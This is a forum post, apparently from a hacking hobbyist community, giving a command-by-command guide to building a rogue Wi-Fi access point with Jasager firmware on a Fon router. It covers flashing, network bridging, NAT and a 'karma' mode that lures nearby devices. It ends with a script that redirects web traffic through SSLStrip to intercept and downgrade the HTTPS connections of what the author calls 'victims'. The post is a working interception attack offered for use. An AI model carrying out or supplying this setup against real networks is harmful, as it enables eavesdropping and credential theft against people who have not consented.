Netshroud Posted December 30, 2009 Share Posted December 30, 2009 (edited) (I'm unsure as how how Step 1 works on a virgin Fon 2100. If it doesn't work, try the downgrading and patching to enabled redboot as mentioned in Darren's guide.) Part 1: Flashing the Fon+ The first step to installing Jasager is to flash the Fon with the Jasager firmware, which can be found at Digininja’s site. (http://www.digininja.org/files/jasager_firmware_1.0.tar.bz2) To simplify the process, I’ll be using the nifty "Fon Flash" application at http://www.gargoyle-router.com/download.php For some reason the Windows version failed to work for me (it was complaining about ARP sizes), so I used the Linux version off an Ubuntu 9.04 LiveCD. I haven’t tried the Windows version on anything other than Vista SP2 Business x64, so if it works for you, enjoy. Untar the Jasager firmware to the directory of your choice, as well as the Fon Flash utility. For some reason Fon Flash failed to launch when I ran it from a Windows share, so I copied it to the desktop. Next, run Fon Flash. If it complains about not finding interfaces, give it your password to sudo itself. Under Windows Vista/7, you probably need to run it with elevated privileges. Make sure that the firmware type is set to "OpenWrt / Gargoyle", and select your Ethernet interface (if you have multiple ones, the one connected to the Fon). Point the Rootfs file to openwrt-atheros-root.squashfs, and the Kernel file to openwrt-atheros-xmlinux.lzma. Next, open up a terminal. Make sure that your Ethernet interface is set to 192.168.0.254. Connect your system to the Fon’s LAN port via Ethernet. Disable any network manager you may have running. For Ubuntu, right-click on the network notification icon and uncheck "Enable Networking". Switch back to the Fon Flash utility, and click "Flash Router Now!" Plug in the power to your Fon (or restart it), sit back and wait until you see the "Device flashed successfully" notification. This took about 15 minutes for me so go for a walk, read a book, or chat in #hakhouse. Part 2: Configuring the Fon and network Once the Fon is flashed, set your computer to an ip on the 192.168.1.0/24 range. Telnet into the Fon on 192.168.1.1. Run ‘passwd’ to set the root password, then disconnect. SSH into the Fon. Accept the host key, and log in as root with your new password. First, you need to enable the wireless. The following commands will do this: uci set wireless.wifi0.disabled=0 uci commit wireless && wifi Next, pick an IP range and IP Address for the Fon. I chose to use one on the private range 172.16-32.X.Y range, because my home network is on the 10. range, and a couple of places I want to demo it at use 192.168. Execute the following commands to do as I did, and set the Fon to 172.20.0.2: uci set network.lan.ipaddr=172.20.0.2 uci set network.lan.gateway=172.20.0.1 uci set network.lan.dns=10.10.0.1 uci commit network (10.10.0.1 is my home router) Also configure dnsmasq to give out the gateway IP and DNS servers. In /etc/config/dhcp, under the section config dhcp lan, add: list 'dhcp_option' '3,172.20.0.1' list 'dhcp_option' '6,10.10.0.1' Reboot the fon (The command via ssh is 'reboot'). Change your IP to be on the Fon’s range, then SSH into its new IP address. Accept the host key. Now we need to set up Internet access on the Fon. When running Jasager, your network setup will/should look like this: Internet --> Router --> Computer --> Fon --> Victims We need to configure the computer to share its internet connection with the Fon. Under Windows, just enable Internet Connection Sharing. Under Linux, execute: echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE where eth0 is your internet-facing interface. If you’re doing what I did, and using a Virtual Machine for Jasager, you need to give it 2 virtual interfaces. For VMware users, run vmnetcfg.exe (Found in C:\Program Files (x86)\VMware\VMware Workstation\ for me). Make sure that one vmnet is bridged to your internet interface, and one is bridged to your Ethernet/Fon interface. If you can now ping google.com from the Fon, move on. If not, make sure you have done everything correctly. Next, I had to edit /karma/www/cgi-bin/functions.rb on the Fon to bridge ath0 correctly. Unless you’re fluent in vi, I would recommend installing nano. opkg update opkg install libncurses nano In functions.rb, underneath: system("wlanconfig ath0 create wlandev wifi0 wlanmode master 2>&1 > /dev/null") add: system("sleep 1") system("brctl addif br-lan ath0") and replace: system("ifconfig", "ath0", "10.1.1.1", "up") with: system("ifconfig", "ath0", "up") Part 3 (Optional): Installing X-Wrt The main reason I need X-Wrt was that I couldn’t figure out how to change the time zone without it. To install X-Wrt, simply run: echo "src X-Wrt http://downloads.x-wrt.org/xwrt/kamikaze/8.09/atheros/packages" >> /etc/opkg.conf opkg update opkg install webif Part 4: Running Jasager Now connect over HTTP using your browser of choice to the Fon on port 1471. Log in with username "root" or "admin", and your root password. Click the big grey button, turn karma on, and wait for victims to get friendly with Jasager. This is the script I use to share the internet on the Ubuntu VM, and start SSLStrip: echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward > /dev/null sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 64123 sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE sudo ifconfig eth1 172.20.0.1 netmask 255.255.255.0 sudo dhclient eth0 python sslstrip-0.7/sslstrip.py -l 64123 -f sslstrip-0.7/lock.ico Edited April 21, 2010 by Psychosis Quote Link to comment Share on other sites More sharing options...
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.